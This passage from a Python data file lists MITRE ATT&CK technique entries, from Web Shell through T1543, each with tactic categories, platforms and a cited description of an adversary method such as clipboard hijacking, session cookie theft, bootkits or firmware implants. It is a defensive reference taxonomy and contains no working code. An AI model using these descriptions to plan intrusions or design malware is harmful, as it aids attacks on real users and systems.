               'description': 'Adversaries may backdoor web servers with web shells to establish persistent access to '
                              'systems. A Web shell is a Web script that is placed on an openly accessible Web server '
                              'to allow an adversary to use the Web server as a gateway into a network. A Web shell '
                              'may provide a set of functions to execute or a command-line interface on the system '
                              'that hosts the Web server.\n'
                              '\n'
                              'In addition to a server-side script, a Web shell may have a client interface program '
                              'that is used to talk to the Web server (ex: [China '
                              'Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee '
                              '2013) ',
               'name': 'Web Shell',
               'platforms': ['Linux', 'Windows', 'macOS']},
 'T1507': {'attack_id': 'T1507',
           'categories': ['collection'],
           'description': 'Adversaries may use device sensors to collect information about nearby networks, such as '
                          'Wi-Fi and Bluetooth.',
           'name': 'Network Information Discovery',
           'platforms': ['Android']},
 'T1508': {'attack_id': 'T1508',
           'categories': ['defense-evasion'],
           'description': 'A malicious application could suppress its icon from being displayed to the user in the '
                          'application launcher to hide the fact that it is installed, and to make it more difficult '
                          "for the user to uninstall the application. Hiding the application's icon programmatically "
                          'does not require any special permissions.\n'
                          '\n'
                          'This behavior has been seen in the BankBot/Spy Banker family of malware.(Citation: '
                          'android-trojan-steals-paypal-2fa)(Citation: sunny-stolen-credentials)(Citation: '
                          'bankbot-spybanker)',
           'name': 'Suppress Application Icon',
           'platforms': ['Android']},
 'T1509': {'attack_id': 'T1509',
           'categories': ['command-and-control'],
           'description': 'Adversaries may use non-standard ports to exfiltrate information.',
           'name': 'Uncommonly Used Port',
           'platforms': ['Android', 'iOS']},
 'T1510': {'attack_id': 'T1510',
           'categories': ['impact'],
           'description': 'Adversaries may abuse clipboard functionality to intercept and replace information in the '
                          'Android device clipboard.(Citation: ESET Clipboard Modification February 2019)(Citation: '
                          'Welivesecurity Clipboard Modification February 2019)(Citation: Syracuse Clipboard '
                          'Modification 2014) Malicious applications may monitor the clipboard activity through the '
                          '<code>ClipboardManager.OnPrimaryClipChangedListener</code> interface on Android to '
                          'determine when the clipboard contents have changed.(Citation: Dr.Webb Clipboard '
                          'Modification origin2 August 2018)(Citation: Dr.Webb Clipboard Modification origin August '
                          '2018) Listening to clipboard activity, reading the clipboard contents, and modifying the '
                          'clipboard contents requires no explicit application permissions and can be performed by '
                          'applications running in the background, however, this behavior has changed with the release '
                          'of Android 10.(Citation: Android 10 Privacy Changes)\n'
                          '\n'
                          'Adversaries may use [Clipboard Modification](https://attack.mitre.org/techniques/T1510) to '
                          'replace text prior to being pasted, for example, replacing a copied Bitcoin wallet address '
                          'with a wallet address that is under adversarial control.\n'
                          '\n'
                          '[Clipboard Modification](https://attack.mitre.org/techniques/T1510) had been seen within '
                          'the Android/Clipper.C trojan. This sample had been detected by ESET in an application '
                          'distributed through the Google Play Store targeting cryptocurrency wallet '
                          'numbers.(Citation: ESET Clipboard Modification February 2019)',
           'name': 'Clipboard Modification',
           'platforms': ['Android']},
 'T1512': {'attack_id': 'T1512',
           'categories': ['collection'],
           'description': 'Adversaries may utilize the camera to capture information about the user, their '
                          'surroundings, or other physical identifiers. Adversaries may use the physical camera '
                          'devices on a mobile device to capture images or video. By default, in Android and iOS, an '
                          'application must request permission to access a camera device which is granted by the user '
                          'through a request prompt. In Android, applications must hold the '
                          '`android.permission.CAMERA` permission to access the camera. In iOS, applications must '
                          'include the `NSCameraUsageDescription` key in the `Info.plist` file, and must request '
                          'access to the camera at runtime.',
           'name': 'Capture Camera',
           'platforms': ['Android', 'iOS']},
 'T1513': {'attack_id': 'T1513',
           'categories': ['collection'],
           'description': 'Adversaries may use screen captures to collect information about applications running in '
                          'the foreground, capture user data, credentials, or other sensitive information. '
                          'Applications running in the background can capture screenshots or videos of another '
                          'application running in the foreground by using the Android `MediaProjectionManager` '
                          '(generally requires the device user to grant consent).(Citation: Fortinet screencap July '
                          '2019)(Citation: Android ScreenCap1 2019) Background applications can also use Android '
                          'accessibility services to capture screen contents being displayed by a foreground '
                          'application.(Citation: Lookout-Monokle) An adversary with root access or Android Debug '
                          'Bridge (adb) access could call the Android `screencap` or `screenrecord` '
                          'commands.(Citation: Android ScreenCap2 2019)(Citation: Trend Micro ScreenCap July 2015)',
           'name': 'Screen Capture',
           'platforms': ['Android']},
 'T1516': {'attack_id': 'T1516',
           'categories': ['defense-evasion', 'impact'],
           'description': 'A malicious application can inject input to the user interface to mimic user interaction '
                          "through the abuse of Android's accessibility APIs.\n"
                          '\n'
                          '[Input Injection](https://attack.mitre.org/techniques/T1516) can be achieved using any of '
                          'the following methods:\n'
                          '\n'
                          "* Mimicking user clicks on the screen, for example to steal money from a user's PayPal "
                          'account.(Citation: android-trojan-steals-paypal-2fa)\n'
                          '* Injecting global actions, such as `GLOBAL_ACTION_BACK` (programatically mimicking a '
                          'physical back button press), to trigger actions on behalf of the user.(Citation: Talos '
                          'Gustuff Apr 2019)\n'
                          '* Inserting input into text fields on behalf of the user. This method is used legitimately '
                          'to auto-fill text fields by applications such as password managers.(Citation: bitwarden '
                          'autofill logins)',
           'name': 'Input Injection',
           'platforms': ['Android']},
 'T1517': {'attack_id': 'T1517',
           'categories': ['collection', 'credential-access'],
           'description': 'A malicious application can read notifications sent by the operating system or other '
                          'applications, which may contain sensitive data such as one-time authentication codes sent '
                          'over SMS, email, or other mediums. A malicious application can also dismiss notifications '
                          'to prevent the user from noticing that the notifications arrived and can trigger action '
                          'buttons contained within notifications.(Citation: ESET 2FA Bypass)',
           'name': 'Access Notifications',
           'platforms': ['Android']},
 'T1518': {'attack_id': 'T1518',
           'categories': ['discovery'],
           'description': 'Adversaries may attempt to get a listing of software and software versions that are '
                          'installed on a system or in a cloud environment. Adversaries may use the information from '
                          '[Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery '
                          'to shape follow-on behaviors, including whether or not the adversary fully infects the '
                          'target and/or attempts specific actions.\n'
                          '\n'
                          'Adversaries may attempt to enumerate software for a variety of reasons, such as figuring '
                          'out what security measures are present or if the compromised system has a version of '
                          'software that is vulnerable to [Exploitation for Privilege '
                          'Escalation](https://attack.mitre.org/techniques/T1068).',
           'name': 'Software Discovery',
           'platforms': ['Linux', 'macOS', 'Windows', 'AWS', 'GCP', 'Azure', 'Office 365', 'Azure AD', 'SaaS']},
 'T1518.001': {'attack_id': 'T1518.001',
               'categories': ['discovery'],
               'description': 'Adversaries may attempt to get a listing of security software, configurations, '
                              'defensive tools, and sensors that are installed on a system or in a cloud environment. '
                              'This may include things such as firewall rules and anti-virus. Adversaries may use the '
                              'information from [Security Software '
                              'Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to '
                              'shape follow-on behaviors, including whether or not the adversary fully infects the '
                              'target and/or attempts specific actions.\n'
                              '\n'
                              'Example commands that can be used to obtain security software information are '
                              '[netsh](https://attack.mitre.org/software/S0108), <code>reg query</code> with '
                              '[Reg](https://attack.mitre.org/software/S0075), <code>dir</code> with '
                              '[cmd](https://attack.mitre.org/software/S0106), and '
                              '[Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery '
                              'behavior may be more specific to the type of software or security system the adversary '
                              'is looking for. It is becoming more common to see macOS malware perform checks for '
                              'LittleSnitch and KnockKnock software.\n'
                              '\n'
                              'Adversaries may also utilize cloud APIs to discover the configurations of firewall '
                              'rules within an environment.(Citation: Expel IO Evil in AWS)',
               'name': 'Security Software Discovery',
               'platforms': ['Linux', 'macOS', 'Windows', 'AWS', 'GCP', 'Azure', 'Office 365', 'Azure AD', 'SaaS']},
 'T1520': {'attack_id': 'T1520',
           'categories': ['command-and-control'],
           'description': 'Adversaries may use [Domain Generation '
                          'Algorithms](https://attack.mitre.org/techniques/T1520) (DGAs) to procedurally generate '
                          'domain names for command and control communication, and other uses such as malicious '
                          'application distribution.(Citation: securelist rotexy 2018)\n'
                          '\n'
                          'DGAs increase the difficulty for defenders to block, track, or take over the command and '
                          'control channel, as there potentially could be thousands of domains that malware can check '
                          'for instructions.',
           'name': 'Domain Generation Algorithms',
           'platforms': ['Android', 'iOS']},
 'T1521': {'attack_id': 'T1521',
           'categories': ['command-and-control'],
           'description': 'Adversaries may explicitly employ a known encryption algorithm to conceal command and '
                          'control traffic rather than relying on any inherent protections provided by a communication '
                          'protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to '
                          'reverse engineering if necessary secret keys are encoded and/or generated within malware '
                          'samples/configuration files.',
           'name': 'Standard Cryptographic Protocol',
           'platforms': ['Android', 'iOS']},
 'T1523': {'attack_id': 'T1523',
           'categories': ['defense-evasion', 'discovery'],
           'description': 'Malicious applications may attempt to detect their operating environment prior to fully '
                          'executing their payloads. These checks are often used to ensure the application is not '
                          'running within an analysis environment such as a sandbox used for application vetting, '
                          'security research, or reverse engineering. \n'
                          'Adversaries may use many different checks such as physical sensors, location, and system '
                          'properties to fingerprint emulators and sandbox environments.(Citation: Talos Gustuff Apr '
                          '2019)(Citation: ThreatFabric Cerberus)(Citation: Xiao-ZergHelper)(Citation: Cyberscoop '
                          'Evade Analysis January 2019) Adversaries may access `android.os.SystemProperties` via Java '
                          'reflection to obtain specific system information.(Citation: Github Anti-emulator) Standard '
                          'values such as phone number, IMEI, IMSI, device IDs, and device drivers may be checked '
                          'against default signatures of common sandboxes.(Citation: Sophos Anti-emulation)\n',
           'name': 'Evade Analysis Environment',
           'platforms': ['Android', 'iOS']},
 'T1525': {'attack_id': 'T1525',
           'categories': ['persistence'],
           'description': 'Adversaries may implant cloud container images with malicious code to establish '
                          'persistence. Amazon Web Service (AWS) Amazon Machine Images (AMI), Google Cloud Platform '
                          '(GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be '
                          'implanted or backdoored. Depending on how the infrastructure is provisioned, this could '
                          'provide persistent access if the infrastructure provisioning tool is instructed to always '
                          'use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)\n'
                          '\n'
                          'A tool has been developed to facilitate planting backdoors in cloud container '
                          'images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an attacker has access to a '
                          'compromised AWS instance, and permissions to list the available container images, they may '
                          'implant a backdoor such as a [Web '
                          'Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image '
                          'Backdoor Technique Sept 2019) Adversaries may also implant Docker images that may be '
                          'inadvertently used in cloud deployments, which has been reported in some instances of '
                          'cryptomining botnets.(Citation: ATT Cybersecurity Cryptocurrency Attacks on Cloud) ',
           'name': 'Implant Container Image',
           'platforms': ['GCP', 'Azure', 'AWS']},
 'T1526': {'attack_id': 'T1526',
           'categories': ['discovery'],
           'description': 'An adversary may attempt to enumerate the cloud services running on a system after gaining '
                          'access. These methods can differ from platform-as-a-service (PaaS), to '
                          'infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist '
                          'throughout the various cloud providers and can include Continuous Integration and '
                          'Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. \n'
                          '\n'
                          'Adversaries may attempt to discover information about the services enabled throughout the '
                          'environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource '
                          'Manager API, can enumerate resources and services, including applications, management '
                          'groups, resources and policy definitions, and their relationships that are accessible by an '
                          'identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)\n'
                          '\n'
                          'Stormspotter is an open source tool for enumerating and constructing a graph for Azure '
                          'resources and services, and Pacu is an open source AWS exploitation framework that supports '
                          'several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: '
                          'GitHub Pacu)',
           'name': 'Cloud Service Discovery',
           'platforms': ['AWS', 'GCP', 'Azure', 'Azure AD', 'Office 365', 'SaaS']},
 'T1528': {'attack_id': 'T1528',
           'categories': ['credential-access'],
           'description': 'Adversaries can steal user application access tokens as a means of acquiring credentials to '
                          'access remote systems and resources. This can occur through social engineering and '
                          'typically requires user action to grant access.\n'
                          '\n'
                          'Application access tokens are used to make authorized API requests on behalf of a user and '
                          'are commonly used as a way to access resources in cloud-based applications and '
                          'software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to '
                          'Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to '
                          'users for access to systems. An application desiring access to cloud-based services or '
                          'protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. '
                          "An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: "
                          'Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code '
                          'Authorization flow - June 2019) An OAuth access token enables a third-party application to '
                          'interact with resources containing user data in the ways requested by the application '
                          'without obtaining user credentials. \n'
                          ' \n'
                          'Adversaries can leverage OAuth authorization by constructing a malicious application '
                          "designed to be granted access to resources with the target user's OAuth token. The "
                          'adversary will need to complete registration of their application with the authorization '
                          'server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, '
                          'the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD '
                          'App Registration - May 2019) Then, they can send a link through [Spearphishing '
                          'Link](https://attack.mitre.org/techniques/T1192) to the target user to entice them to grant '
                          'access to the application. Once the OAuth access token is granted, the application can gain '
                          'potentially long-term access to features of the user account through [Application Access '
                          'Token](https://attack.mitre.org/techniques/T1527).(Citation: Microsoft - Azure AD Identity '
                          'Tokens - Aug 2019)\n'
                          '\n'
                          'Adversaries have been seen targeting Gmail, Microsoft Outlook, and Yahoo Mail '
                          'users.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn '
                          'Storm OAuth 2017)',
           'name': 'Steal Application Access Token',
           'platforms': ['SaaS', 'Office 365', 'Azure AD']},
 'T1529': {'attack_id': 'T1529',
           'categories': ['impact'],
           'description': 'Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction '
                          'of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of '
                          'a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of '
                          'a remote computer.(Citation: Microsoft Shutdown Oct 2017) Shutting down or rebooting '
                          'systems may disrupt access to computer resources for legitimate users.\n'
                          '\n'
                          'Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such '
                          'as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System '
                          'Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on '
                          'system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer '
                          '2018)',
           'name': 'System Shutdown/Reboot',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1530': {'attack_id': 'T1530',
           'categories': ['collection'],
           'description': 'Adversaries may access data objects from improperly secured cloud storage.\n'
                          '\n'
                          'Many cloud service providers offer solutions for online data storage such as Amazon S3, '
                          'Azure Storage, and Google Cloud Storage. These solutions differ from other storage '
                          'solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data '
                          "from these solutions can be retrieved directly using the cloud provider's APIs. Solution "
                          'providers typically offer security guides to help end users configure systems.(Citation: '
                          'Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: '
                          'Google Cloud Storage Best Practices, 2019)\n'
                          '\n'
                          'Misconfiguration by end users is a common problem. There have been numerous incidents where '
                          'cloud storage has been improperly secured (typically by unintentionally allowing public '
                          'access by unauthenticated users or overly-broad access by all users), allowing open access '
                          'to credit cards, personally identifiable information, medical records, and other sensitive '
                          'information.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 '
                          'Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017) Adversaries may also obtain leaked '
                          'credentials in source repositories, logs, or other means as a way to gain access to cloud '
                          'storage objects that have access permission controls.',
           'name': 'Data from Cloud Storage Object',
           'platforms': ['AWS', 'GCP', 'Azure']},
 'T1531': {'attack_id': 'T1531',
           'categories': ['impact'],
           'description': 'Adversaries may interrupt availability of system and network resources by inhibiting access '
                          'to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated '
                          '(ex: changed credentials) to remove access to accounts.\n'
                          '\n'
                          'Adversaries may also subsequently log off and/or reboot boxes to set malicious changes into '
                          'place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)',
           'name': 'Account Access Removal',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1532': {'attack_id': 'T1532',
           'categories': ['exfiltration'],
           'description': 'Data is encrypted before being exfiltrated in order to hide the information that is being '
                          'exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by '
                          'a defender. The encryption is performed by a utility, programming library, or custom '
                          'algorithm on the data itself and is considered separate from any encryption performed by '
                          'the command and control or file transfer protocol. Common file formats that can encrypt '
                          'files are RAR and zip.',
           'name': 'Data Encrypted',
           'platforms': ['Android', 'iOS']},
 'T1533': {'attack_id': 'T1533',
           'categories': ['collection'],
           'description': 'Sensitive data can be collected from local system sources, such as the file system or '
                          'databases of information residing on the system.\n'
                          '\n'
                          'Local system data includes information stored by the operating system. Access to local '
                          'system data often requires escalated privileges (e.g. root access). Examples of local '
                          'system data include authentication tokens, the device keyboard cache, Wi-Fi passwords, and '
                          'photos.',
           'name': 'Data from Local System',
           'platforms': ['Android', 'iOS']},
 'T1534': {'attack_id': 'T1534',
           'categories': ['lateral-movement'],
           'description': 'Adversaries may use internal spearphishing to gain access to additional information or '
                          'exploit other users within the same organization after they already have access to accounts '
                          'or systems within the environment. Internal spearphishing is multi-staged attack where an '
                          "email account is owned either by controlling the user's device with previously installed "
                          'malware or by compromising the account credentials of the user. Adversaries attempt to take '
                          'advantage of a trusted internal account to increase the likelihood of tricking the target '
                          'into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the '
                          'Inside 2017)\n'
                          '\n'
                          'Adversaries may leverage [Spearphishing '
                          'Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing '
                          'Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to '
                          'deliver a payload or redirect to an external site to capture credentials through [Input '
                          'Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login '
                          'interfaces.\n'
                          '\n'
                          'There have been notable incidents where internal spearphishing has been used. The Eye '
                          'Pyramid campaign used phishing emails with malicious attachments for lateral movement '
                          'between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend '
                          'Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) '
                          'compromised email accounts at the Financial Times (FT) to steal additional account '
                          'credentials. Once FT learned of the attack and began warning employees of the threat, the '
                          'SEA sent phishing emails mimicking the Financial Times IT department and were able to '
                          'compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.)',
           'name': 'Internal Spearphishing',
           'platforms': ['Windows', 'macOS', 'Linux', 'Office 365', 'SaaS']},
 'T1535': {'attack_id': 'T1535',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may create cloud instances in unused geographic service regions in order to '
                          'evade detection. Access is usually obtained through compromising accounts used to manage '
                          'cloud infrastructure.\n'
                          '\n'
                          'Cloud service providers often provide infrastructure throughout the world in order to '
                          'improve performance, provide redundancy, and allow customers to meet compliance '
                          'requirements. Oftentimes, a customer will only use a subset of the available regions and '
                          'may not actively monitor other regions. If an adversary creates resources in an unused '
                          'region, they may be able to operate undetected.\n'
                          '\n'
                          'A variation on this behavior takes advantage of differences in functionality across cloud '
                          'regions. An adversary could utilize regions which do not support advanced detection '
                          'services in order to avoid detection of their activity. For example, AWS GuardDuty is not '
                          'supported in every region.(Citation: AWS Region Service Table)\n'
                          '\n'
                          'An example of adversary use of unused AWS regions is to mine cryptocurrency through '
                          '[Resource Hijacking](https://attack.mitre.org/techniques/T1496), which can cost '
                          'organizations substantial amounts of money over time depending on the processing power '
                          'used.(Citation: CloudSploit - Unused AWS Regions)',
           'name': 'Unused/Unsupported Cloud Regions',
           'platforms': ['AWS', 'GCP', 'Azure']},
 'T1537': {'attack_id': 'T1537',
           'categories': ['exfiltration'],
           'description': 'Adversaries may exfiltrate data by transferring the data, including backups of cloud '
                          'environments, to another cloud account they control on the same service to avoid typical '
                          'file transfers/downloads and network-based exfiltration detection.\n'
                          '\n'
                          'A defender who is monitoring for large transfers to outside the cloud environment through '
                          'normal file transfers or over command and control channels may not be watching for data '
                          'transfers to another account within the same cloud provider. Such transfers may utilize '
                          'existing cloud provider APIs and the internal address space of the cloud provider to blend '
                          'into normal traffic or avoid data transfers over external network interfaces.\n'
                          '\n'
                          'Incidents have been observed where adversaries have created backups of cloud instances and '
                          'transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018) ',
           'name': 'Transfer Data to Cloud Account',
           'platforms': ['Azure', 'AWS', 'GCP']},
 'T1538': {'attack_id': 'T1538',
           'categories': ['discovery'],
           'description': 'An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful '
                          'information from an operational cloud environment, such as specific services, resources, '
                          'and features. For example, the GCP Command Center can be used to view all assets, findings '
                          'of potential security risks, and to run additional queries, such as finding public IP '
                          'addresses and open ports.(Citation: Google Command Center Dashboard)\n'
                          '\n'
                          'Depending on the configuration of the environment, an adversary may be able to enumerate '
                          'more information via the graphical dashboard than an API. This allows the adversary to gain '
                          'information without making any API requests.',
           'name': 'Cloud Service Dashboard',
           'platforms': ['AWS', 'GCP', 'Azure', 'Azure AD', 'Office 365']},
 'T1539': {'attack_id': 'T1539',
           'categories': ['credential-access'],
           'description': 'An adversary may steal web application or service session cookies and use them to gain '
                          'access web applications or Internet services as an authenticated user without needing '
                          'credentials. Web applications and services often use session cookies as an authentication '
                          'token after a user has authenticated to a website.\n'
                          '\n'
                          'Cookies are often valid for an extended period of time, even if the web application is not '
                          'actively used. Cookies can be found on disk, in the process memory of the browser, and in '
                          'network traffic to remote systems. Additionally, other applications on the targets machine '
                          'might store sensitive authentication cookies in memory (e.g. apps which authenticate to '
                          'cloud services). Session cookies can be used to bypasses some multi-factor authentication '
                          'protocols.(Citation: Pass The Cookie)\n'
                          '\n'
                          'There are several examples of malware targeting cookies from web browsers on the local '
                          'system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies '
                          'January 2019) There are also open source frameworks such as Evilginx 2 and Muraena that can '
                          'gather session cookies through a man-in-the-middle proxy that can be set up by an adversary '
                          'and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)\n'
                          '\n'
                          'After an adversary acquires a valid cookie, they can then perform a [Web Session '
                          'Cookie](https://attack.mitre.org/techniques/T1506) technique to login to the corresponding '
                          'web application.',
           'name': 'Steal Web Session Cookie',
           'platforms': ['Linux', 'macOS', 'Windows', 'Office 365', 'SaaS']},
 'T1540': {'attack_id': 'T1540',
           'categories': ['persistence', 'privilege-escalation', 'defense-evasion'],
           'description': 'Adversaries may use code injection attacks to implant arbitrary code into the address space '
                          'of a running application. Code is then executed or interpreted by that application. '
                          'Adversaries utilizing this technique may exploit capabilities to load code in at runtime '
                          'through dynamic libraries.\n'
                          '\n'
                          'With root access, `ptrace` can be used to target specific applications and load shared '
                          'libraries into its process memory.(Citation: Shunix Code Injection Mar 2016)(Citation: '
                          'Fadeev Code Injection Aug 2018) By injecting code, an adversary may be able to gain access '
                          'to higher permissions held by the targeted application by executing as the targeted '
                          'application. In addition, the adversary may be able to evade detection or enable persistent '
                          'access to a system under the guise of the application’s process.(Citation: Google Triada '
                          'June 2019)\n',
           'name': 'Code Injection',
           'platforms': ['Android', 'iOS']},
 'T1541': {'attack_id': 'T1541',
           'categories': ['collection', 'persistence'],
           'description': "Adversaries may abuse Android's `startForeground()` API method to maintain continuous "
                          'sensor access. Beginning in Android 9, idle applications running in the background no '
                          'longer have access to device sensors, such as the camera, microphone, and '
                          'gyroscope.(Citation: Android-SensorsOverview) Applications can retain sensor access by '
                          'running in the foreground, using Android’s `startForeground()` API method. This informs the '
                          'system that the user is actively interacting with the application, and it should not be '
                          'killed. The only requirement to start a foreground service is showing a persistent '
                          'notification to the user.(Citation: Android-ForegroundServices)\n'
                          '\n'
                          'Malicious applications may abuse the `startForeground()` API method to continue running in '
                          'the foreground, while presenting a notification to the user pretending to be a genuine '
                          'application. This would allow unhindered access to the device’s sensors, assuming '
                          'permission has been previously granted.(Citation: BlackHat Sutter Android Foreground 2019)\n'
                          '\n'
                          'Malicious applications may also abuse the `startForeground()` API to inform the Android '
                          'system that the user is actively interacting with the application, thus preventing it from '
                          'being killed by the low memory killer.(Citation: TrendMicro-Yellow Camera)',
           'name': 'Foreground Persistence',
           'platforms': ['Android']},
 'T1542': {'attack_id': 'T1542',
           'categories': ['defense-evasion', 'persistence'],
           'description': 'Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. '
                          'During the booting process of a computer, firmware and various startup services are loaded '
                          'before the operating system. These programs control flow of execution before the operating '
                          'system takes control.(Citation: Wikipedia Booting)\n'
                          '\n'
                          'Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output '
                          'System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a '
                          'layer below the operating system. This can be particularly difficult to detect as malware '
                          'at this level will not be detected by host software-based defenses.',
           'name': 'Pre-OS Boot',
           'platforms': ['Linux', 'Windows', 'Network']},
 'T1542.001': {'attack_id': 'T1542.001',
               'categories': ['persistence', 'defense-evasion'],
               'description': 'Adversaries may modify system firmware to persist on systems.The BIOS (Basic '
                              'Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible '
                              'Firmware Interface (EFI) are examples of system firmware that operate as the software '
                              'interface between the operating system and hardware of a computer. (Citation: Wikipedia '
                              'BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)\n'
                              '\n'
                              'System firmware like BIOS and (U)EFI underly the functionality of a computer and may be '
                              'modified by an adversary to perform or assist in malicious activity. Capabilities exist '
                              'to overwrite the system firmware, which may give sophisticated adversaries a means to '
                              'install malicious firmware updates as a means of persistence on a system that may be '
                              'difficult to detect.',
               'name': 'System Firmware',
               'platforms': ['Windows']},
 'T1542.002': {'attack_id': 'T1542.002',
               'categories': ['persistence', 'defense-evasion'],
               'description': 'Adversaries may modify component firmware to persist on systems. Some adversaries may '
                              'employ sophisticated means to compromise computer components and install malicious '
                              'firmware that will execute adversary code outside of the operating system and main '
                              'system firmware or BIOS. This technique may be similar to [System '
                              'Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other '
                              'system components/devices that may not have the same capability or level of integrity '
                              'checking.\n'
                              '\n'
                              'Malicious component firmware could provide both a persistent level of access to systems '
                              'despite potential typical failures to maintain access and hard disk re-images, as well '
                              'as a way to evade host software-based defenses and integrity checks.',
               'name': 'Component Firmware',
               'platforms': ['Windows']},
 'T1542.003': {'attack_id': 'T1542.003',
               'categories': ['persistence', 'defense-evasion'],
               'description': 'Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below '
                              'the operating system and may make it difficult to perform full remediation unless an '
                              'organization suspects one was used and can act accordingly.\n'
                              '\n'
                              'A bootkit is a malware variant that modifies the boot sectors of a hard drive, '
                              'including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: '
                              'Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after '
                              'completing hardware initialization by the BIOS. It is the location of the boot loader. '
                              'An adversary who has raw access to the boot drive may overwrite this area, diverting '
                              'execution during startup from the normal boot loader to adversary code. (Citation: Lau '
                              '2011)\n'
                              '\n'
                              'The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an '
                              'adversary who has raw access to the boot drive may overwrite the VBR to divert '
                              'execution during startup to adversary code.',
               'name': 'Bootkit',
               'platforms': ['Linux', 'Windows']},
 'T1542.004': {'attack_id': 'T1542.004',
               'categories': ['defense-evasion', 'persistence'],
               'description': 'Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with '
                              'adversary code to provide persistent access and manipulate device behavior that is '
                              'difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog '
                              'Legacy Device Attacks)\n'
                              '\n'
                              '\n'
                              'ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, '
                              'or boot helper to initialize hardware and software when the platform is powered on or '
                              'reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an '
                              'adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) '
                              'with adversary code and restart the device in order to overwrite the existing ROMMON '
                              'image. This provides adversaries with the means to update the ROMMON to gain '
                              'persistence on a system in a way that may be difficult to detect.',
               'name': 'ROMMONkit',
               'platforms': ['Network']},
 'T1542.005': {'attack_id': 'T1542.005',
               'categories': ['defense-evasion', 'persistence'],
               'description': 'Adversaries may abuse netbooting to load an unauthorized network device operating '
                              'system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is '
                              'commonly used by network administrators to load configuration-controlled network device '
                              'images from a centralized management server. Netbooting is one option in the boot '
                              'sequence and can be used to centralize, manage, and control device images.\n'
                              '\n'
                              'Adversaries may manipulate the configuration on the network device specifying use of a '
                              'malicious TFTP server, which may be used in conjunction with [Modify System '
                              'Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device '
                              'startup or reset. The unauthorized image allows adversaries to modify device '
                              'configuration, add malicious capabilities to the device, and introduce backdoors to '
                              'maintain control of the network device while minimizing detection through use of a '
                              'standard functionality. This technique is similar to '
                              '[ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the '
                              'network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks)',
               'name': 'TFTP Boot',
               'platforms': ['Network']},
 'T1543': {'attack_id': 'T1543',
           'categories': ['persistence', 'privilege-escalation'],
           'description': 'Adversaries may create or modify system-level processes to repeatedly execute malicious '
                          'payloads as part of persistence. When operating systems boot up, they can start processes '
                          'that perform background system functions. On Windows and Linux, these system processes are '
                          'referred to as services. (Citation: TechNet Services) On macOS, launchd processes known as '
                          '[Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch '
                          'Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system '
